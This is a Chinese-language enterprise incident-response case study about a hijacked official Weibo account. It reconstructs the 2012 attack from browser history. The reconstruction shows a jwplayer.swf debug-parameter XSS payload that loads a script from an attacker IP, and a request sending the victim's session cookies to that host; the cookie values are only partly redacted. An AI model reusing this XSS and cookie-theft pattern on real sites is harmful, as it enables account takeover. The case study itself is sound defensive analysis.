“企业应急响应和反渗透”之真实案例分析

0x04 案例之官微帐号被盗

这是第一个案例，是官方微博帐号被盗的案例。首先看下面两张图片： 

某天我们的一个官方帐号突发连续发两条不正常的微博内容，看到第一条的时候还以为是工作人员小手一抖，test 到手，以为是工作人员的误操作，但是看到第二条微博的时候就已经能够判断帐号出了问题，具体是什么问题只能通过后面的分析才知道。

但是肯定的是这不是工作人员进行的操作，一方面在这种重要帐号的操作上有一些制度，其次是发布的内容也比较明显，根据发布的时间通过后台系统分析，该帐号有通过 cookie 在非公司 IP 进行过登录，但是我们的 cookie 是通过 httponly 进行保护的，how?

接下来锁定那个时间段操作过官方微博帐号同事的工作电脑，在其使用的火狐浏览器中发现有下面连续的几条访问记录：

1. ==================================================  
2. URL               : http://t.cn/zW*bUQ  
3. Last Visit Date   : 2012-7-16 19:22:27 
4. ==================================================  
5.  
6. ==================================================  
7. URL               : http://50.116.13.242/index.php  
8. Last Visit Date   : 2012-7-16 19:22:28  
9. Referrer          : http://t.cn/zW*bUQ 
10. ==================================================  
11.  
12. ==================================================  
13. URL               : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript：%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
14. Last Visit Date   : 2012-7-16 19:22:28  
15. Referrer          : http://50.116.13.242/index.php  
16. Title             : player.swf (application/x-shockwave-flash 对象)  
17. ==================================================  
18.  
19. ==================================================  
20. URL               : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2  
21. Last Visit Date   : 2012-7-16 19:22:31  
22. Referrer          : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript：%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
23. ================================================== 

对上面的访问记录我想我不需要做太多的解释。在官方微博帐号的私信里面有 http://t.cn/zW*bUQ 的私信记录。

到这里就已经能够还原整个攻击场景了

工作人员收到一条私信，并且打开了

私信链接是一个 xss 漏洞的链接

攻击代码利用另外一个业务的 apache httponly cookie 泄露漏洞窃取到 cookie

事后我们修复了这次攻击中的漏洞，同时修复了业务中同类的安全漏洞，同时加强了员工安全意识，并且增加了相应的帐号安全策略。

最后我们通过后台的 IP 和邮箱等数据定位到了攻击者，在整个攻击中也并没有恶意，他也把相关的漏洞和攻击过程提交到乌云漏洞报告平台，大家可以去主站找找这个漏洞，我这里就不贴相关链接了。